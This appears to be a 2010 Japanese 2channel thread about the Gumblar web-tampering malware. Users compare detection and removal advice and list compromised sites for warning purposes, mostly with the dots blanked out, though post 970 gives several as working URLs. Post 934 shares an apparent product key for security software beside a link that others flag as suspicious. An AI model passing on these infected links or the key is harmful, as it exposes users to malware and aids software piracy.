しかもこれ他でもないこのスレの過去ログだから誰かが直リンで貼った改ざんサイトのURLに反応してカスペが遮断しただけかね?
それともスレ住人が書いたスクリプトにでも反応したのか
>>2はしてあるしjavascriptも無効でその上仮想ブラウザ使ってるんだがちょっと不安になったもんで・・・
0913名無しさん@お腹いっぱい。
2010/04/18(日) 12:58:112ちゃんのログかな
なら問題ない
0914名無しさん@お腹いっぱい。
2010/04/18(日) 14:15:39danさんとこも普通に使えてるよ
0915名無しさん@お腹いっぱい。
2010/04/18(日) 17:35:26再起動すると立ち上がらなくなったりとか?
0916名無しさん@お腹いっぱい。
2010/04/18(日) 19:01:53ぶっちゃけ何やるかはクラッカーの気分次第なんじゃないかな・・・
0917名無しさん@お腹いっぱい。
2010/04/18(日) 19:12:000918名無しさん@お腹いっぱい。
2010/04/18(日) 19:25:45ルートキットに仕込まれたものも見つけ出せるようなのを開発したら
ノーベル賞取れるくらい難しいの?
0919名無しさん@お腹いっぱい。
2010/04/18(日) 19:28:410920名無しさん@お腹いっぱい。
2010/04/18(日) 19:28:44見つけ出すのは知識があればそれなりに出来るが、
駆除するのは非常に難しい。
それはセキュリティのプロでもルートキットを発見すると即クリーンインストールするほどだ。
0921名無しさん@お腹いっぱい。
2010/04/18(日) 19:42:18感染させる目的が「利用者を困らせること」じゃなくて
「自分たち(と顧客)がそのPCを自由に使えるようにすること」だから
あからさまな不具合を出すようなことはあんまりない
たまにミスって出ちゃうけどそういうのはすぐ修正される
自由に使って何をしたいかというと、フィッシング詐欺用のサイトを構築したり
スパムメールを送りまくったり、どっかの国の政府関連サイトを攻撃したり
要は犯罪のお手伝いをすることになります
それによってある日突然おまわりさんがおうちに来るかもしれません
0922名無しさん@お腹いっぱい。
2010/04/18(日) 20:26:46BlackLight使え
といっても、ある種のルートキットは、それでも見つからんけどね。
糞ニーの仕込むルートキット発見した人も、
自分でデバッガ作ってそれで見つけたそうだし
0923U.F.O ◆U.F.OnbYNA
2010/04/18(日) 21:29:17ガンブラー
ttp://www●plci●net/egf/?s=shiseldoh
0924名無しさん@お腹いっぱい。
2010/04/18(日) 21:55:318080さんついに1位になりましたw
0925コテハン ◆8080adndqg
2010/04/18(日) 23:09:42旧型のタイプ違いが混在
www●plci●net/以下の階層は全滅かな?
禿検索で"window;var" "unescape;var"やってみなー
unescape;this型を除外しても凄い数・・・orz
0926名無しさん@お腹いっぱい。
2010/04/19(月) 10:51:1160●37●110●200/
0927名無しさん@お腹いっぱい。
2010/04/19(月) 11:05:43特に異常は見受けられんが
0928名無しさん@お腹いっぱい。
2010/04/19(月) 13:58:13wwwwwwwwwww.net/
0929名無しさん@お腹いっぱい。
2010/04/19(月) 17:47:42> cashingalliance
昨日、有効なスクリプトの再改竄を確認、つーほー。
あちらの鯖缶から午前中に停止等の処置済みの連絡、確認すますた。
0930名無しさん@お腹いっぱい。
2010/04/19(月) 20:08:191 済
2 Foxit Reader使ってるので未導入
3 同上
4 済
5 済
6 済
0931名無しさん@お腹いっぱい。
2010/04/19(月) 20:10:200932名無しさん@お腹いっぱい。
2010/04/19(月) 20:34:11そういうおいらは Linux使いw
0933名無しさん@お腹いっぱい。
2010/04/19(月) 21:01:440934名無しさん@お腹いっぱい。
2010/04/19(月) 21:11:53http://www.techgravy.net/2010/04/free-trend-micro-internet-security-2010.html
http://virusbuster.jp/vb2010/trial2/?cid=paid_aw_1&sem_detection
どちらか必要な方を落として、
Enter this product key pfeo-9996-0691-8113-9527 ( OEM version )
このキーを使用で行ける。
0935名無しさん@お腹いっぱい。
2010/04/19(月) 21:13:28安全第一ならFoxit Readerは避けた方がいい。
安全性よりも軽さの方が大事なら自己責任で使えばいいけど。
0936名無しさん@お腹いっぱい。
2010/04/19(月) 21:21:250937名無しさん@お腹いっぱい。
2010/04/19(月) 21:33:130938名無しさん@お腹いっぱい。
2010/04/19(月) 21:36:23インターネットに接続しなければおk
0939名無しさん@お腹いっぱい。
2010/04/19(月) 21:40:16上のアドレスはウイルス注意
0940名無しさん@お腹いっぱい。
2010/04/19(月) 21:42:33変なスクリプトはあるけどウイルスじゃなくね?
0941名無しさん@お腹いっぱい。
2010/04/19(月) 21:51:46ソース見たけど怪しすぎるだろ、そこ。
trendmicroのアンチウイルス落とすのに、そんなサイト行く必要無いだろ
0942名無しさん@お腹いっぱい。
2010/04/19(月) 22:24:210944コテハン ◆8080adndqg
2010/04/19(月) 23:16:45それは・・俺が掘ってきた陥落サイトも含むのか?
【陥落サイトのURL悪用厳禁】とか
危ないとこは「←アクセス注意」とか書いてるんだが・・・
0945名無しさん@お腹いっぱい。
2010/04/19(月) 23:22:20スレタイと合ってる分には問題ないだろ
バスターなんてどう考えても関係ない
0946コテハン ◆8080adndqg
2010/04/19(月) 23:34:46では、スレタイ通りの陥落サイトを。
URLがアヤシイのは気のせいだ(たぶん)
【陥落サイトのURL悪用厳禁】
www●god-hand●org ←途中で切れてる
22ch●org/pocketsbs/
0947コテハン ◆8080adndqg
2010/04/19(月) 23:48:14【陥落サイトのURL悪用厳禁】
amyou●net/
↓たぶん全滅↓
ttp://www●google●co●jp/search?hl=ja&source=hp&q=site%3Aamyou●net
70po●com/pocketsbs/
ttp://www●google●co●jp/search?hl=ja&q=site%3A*%2Fpocketsbs%2F
絞り込み方法を模索ちう...
> god-hand
jsが ぁぅぁぅぁー
0949名無しさん@お腹いっぱい。
2010/04/20(火) 00:10:53メーカーのサイトだが、ウィルス警告が出た。
とりあえず間違いかもしれないので注意喚起のためにスレ探し回ってここに書いてみたが、
どうですかね? 公式サイトなんでググればすぐ出るし。
0950名無しさん@お腹いっぱい。
2010/04/20(火) 00:12:230951名無しさん@お腹いっぱい。
2010/04/20(火) 01:02:360952名無しさん@お腹いっぱい。
2010/04/20(火) 01:44:24下手なワードもOR打ちゃ当たる的な何かorz
0953名無しさん@お腹いっぱい。
2010/04/20(火) 01:45:310954名無しさん@お腹いっぱい。
2010/04/20(火) 18:25:42横から失礼。Foxitが純正リーダーに次ぐ危険性だとは思わなんだ。
ところで、代替リーダーどれかオススメしてくれないか?
0955コテハン ◆8080adndqg
2010/04/20(火) 18:29:41kagaden●com/haato ←途中切れ
www●shinsei-fukushi●net
www●0120110908●com/ ←ガル繋がり?
www●hd-cre●com/
↓たぶん全滅↓
ttp://www●google●co●jp/search?hl=ja&q=site%3Ahd-cre●com%2F
誰か新スレ建ててくださいなのです...
0956名無しさん@お腹いっぱい。
2010/04/20(火) 18:31:38Google ドキュメント ビューア
ttp://docs.google.com/viewer
0957名無しさん@お腹いっぱい。
2010/04/20(火) 19:36:36http://pc12.2ch.net/software/
0958名無しさん@お腹いっぱい。
2010/04/20(火) 20:10:03勘違いしてはいけない。逆だ。
ことセキュリティに関しては、今のFoxit ReaderはAdobe Readerより下。
0959名無しさん@お腹いっぱい。
2010/04/20(火) 20:19:310960名無しさん@お腹いっぱい。
2010/04/20(火) 22:57:47> kagaden
index2.phpとindex3.phpが ぁぅぁぅぁー
0961名無しさん@お腹いっぱい。
2010/04/21(水) 03:13:170962961
2010/04/21(水) 03:20:21【Gumblar/GENO】Web改竄ウイルス総合スレ8【8080】
http://pc11.2ch.net/test/read.cgi/sec/1271787262/
0963名無しさん@お腹いっぱい。
2010/04/21(水) 07:28:55乙
0964名無しさん@お腹いっぱい。
2010/04/21(水) 21:31:43乙です
0965738
2010/04/22(木) 01:36:58Last-Modified: Wed, 21 Apr 2010 14:36:46 GMT : /content/index.htm
>NPO愛知ネットからのお詫びとお知らせ
(´・ω・`)ショボーン
0966コテハン ◆8080adndqg
2010/04/22(木) 14:21:32理事長:天野竹行>
改竄されていた事を隠蔽せず、告知を行ってください。
【重要】NPO愛知ネットからのお詫びとお知らせ
◆当ホームページを管理しているパソコンがGumblar亜種に感染し、ホームページが改竄されておりました。
◆改竄されていた期間
○月○日○時○分〜●月●日●時●分
◆改竄されていたページ
◆該当期間に当ホームページを閲覧した方へ
セキュリティソフトで(以下略
オンラインスキャンで(以下略
↑こんな感じで。
マトモな対応ができないなら、ホームページを閉鎖してweb上から消滅してください。
0967名無しさん@お腹いっぱい。
2010/04/22(木) 16:40:110968名無しさん@お腹いっぱい。
2010/04/22(木) 16:49:59何でそんな偉そうなんだ
0969名無しさん@お腹いっぱい。
2010/04/22(木) 17:16:33なんてったって人柱リンクチェッカーが山のようにいるからな!
0970名無しさん@お腹いっぱい。
2010/04/22(木) 17:17:51http://amyou.net/
http://70po.com/pocketsbs/
http://www.shinsei-fukushi.net
http://www.0120110908.com/
http://www.hd-cre.com/
0971名無しさん@お腹いっぱい。
2010/04/22(木) 20:12:50おっきいw
0972名無しさん@お腹いっぱい。
2010/04/24(土) 08:11:290973名無しさん@お腹いっぱい。
2010/04/24(土) 12:41:06流れがあっちに行っちゃってどうしたものやら
【陥落サイトのURL悪用厳禁】
再改竄、放置プレイ、新規サイトのごった煮です
重複してたらスルーしてちょうだい
"unescape;var" "new RegExp" -JAVA -JAVAScript
pre21●jp
www●sakiko●jp
www●shinsei-fukushi●net
www●marbell●jp
www●ecos-kenya●jp
0974名無しさん@お腹いっぱい。
2010/04/24(土) 13:31:58これもかな?
realshoponline.info:8080/worldofwarcraft-com/google.com/lemonde.fr.php
0975名無しさん@お腹いっぱい。
2010/04/24(土) 15:41:51http://support.kaspersky.co.jp/viruses/solutions?qid=208283462
0976名無しさん@お腹いっぱい。
2010/04/24(土) 15:42:51>>1
それでもリンクされるから危ない
0977名無しさん@お腹いっぱい。
2010/04/24(土) 19:01:23テンプレの書き方に従えないならアドレスは一切貼らない方がいい
0978名無しさん@お腹いっぱい。
2010/04/24(土) 19:06:070979名無しさん@お腹いっぱい。
2010/04/24(土) 19:37:00どなたか教えてください
http://ime●nu/amyou●net/?free/n/e/t/download/number=2010
0980名無しさん@お腹いっぱい。
2010/04/24(土) 19:42:270981名無しさん@お腹いっぱい。
2010/04/24(土) 19:46:020982名無しさん@お腹いっぱい。
2010/04/24(土) 19:51:440983名無しさん@お腹いっぱい。
2010/04/24(土) 19:53:260984979
2010/04/24(土) 19:53:42http://amyou●net/?free/n/e/t/download/number=2010
0985名無しさん@お腹いっぱい。
2010/04/24(土) 19:54:550986名無しさん@お腹いっぱい。
2010/04/24(土) 19:57:53ちょっとは自分で調べると良いよ
このスレにも報告されてる
0987名無しさん@お腹いっぱい。
2010/04/24(土) 20:00:11>>947
0988名無しさん@お腹いっぱい。
2010/04/24(土) 20:01:390989名無しさん@お腹いっぱい。
2010/04/24(土) 20:06:250990名無しさん@お腹いっぱい。
2010/04/24(土) 20:07:090991名無しさん@お腹いっぱい。
2010/04/24(土) 20:07:520992名無しさん@お腹いっぱい。
2010/04/24(土) 20:08:330993名無しさん@お腹いっぱい。
2010/04/24(土) 20:09:500994名無しさん@お腹いっぱい。
2010/04/24(土) 20:11:170995名無しさん@お腹いっぱい。
2010/04/24(土) 20:12:14次スレ
【Gumblar/GENO】Web改竄ウイルス総合スレ8【8080】
http://pc11.2ch.net/test/read.cgi/sec/1271787262/
0996名無しさん@お腹いっぱい。
2010/04/24(土) 20:12:560997名無しさん@お腹いっぱい。
2010/04/24(土) 20:14:160998名無しさん@お腹いっぱい。
2010/04/24(土) 20:31:30専ブラ使えよ
0999名無しさん@お腹いっぱい。
2010/04/24(土) 20:32:531000名無しさん@お腹いっぱい。
2010/04/24(土) 20:33:4110011001
Over 1000Threadもう書けないので、新しいスレッドを立ててくださいです。。。
レス数が1000を超えています。これ以上書き込みはできません。